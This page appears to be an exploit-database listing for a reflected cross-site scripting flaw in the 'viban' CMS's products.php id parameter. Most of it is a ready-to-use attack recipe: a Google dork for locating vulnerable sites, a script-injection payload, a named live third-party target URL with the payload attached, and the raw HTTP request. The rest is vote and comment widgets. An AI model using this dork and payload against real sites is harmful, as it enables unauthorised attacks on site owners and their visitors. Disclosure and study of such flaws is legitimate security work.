viban cms Cross Site Scripting vulnerability

2017.10.23

IRANIAN ETHICAL HACKERS (IR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: intext:"تمامی حقوق برای وینتا محفوظ می باشد . قدرت گرفته از ویبان" inurl:php?id=

[+] Exploit Title ; viban cms Cross Site Scripting vulnerability
[+] Date : 2017-10-22
[+] Author : 0p3n3r From IRANIAN ETHICAL HACKERS
[+] Vendor Homepage : http://viban.ir/
[+] Dork : intext:"تمامی حقوق برای وینتا محفوظ می باشد . قدرت گرفته از ویبان" inurl:php?id=
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Poc :
[!] Search Dork on google and add exploit to Address bar
[+] Vulnerability File:
[!] products.php
[+] Exploit :
[!] "><script>alert('0P3N3R')</script>
[+] Target :
[!] http://vinta.ir/products.php?id=2867864"><script>alert('0P3N3R')</script>
[+] Request :
GET /products.php?id=2867864%22%3E%3Cscript%3Ealert(%270P3N3R%27)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

viban cms Cross Site Scripting vulnerability

Dork: intext:"تمامی حقوق برای وینتا محفوظ می باشد . قدرت گرفته از ویبان" inurl:php?id=

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.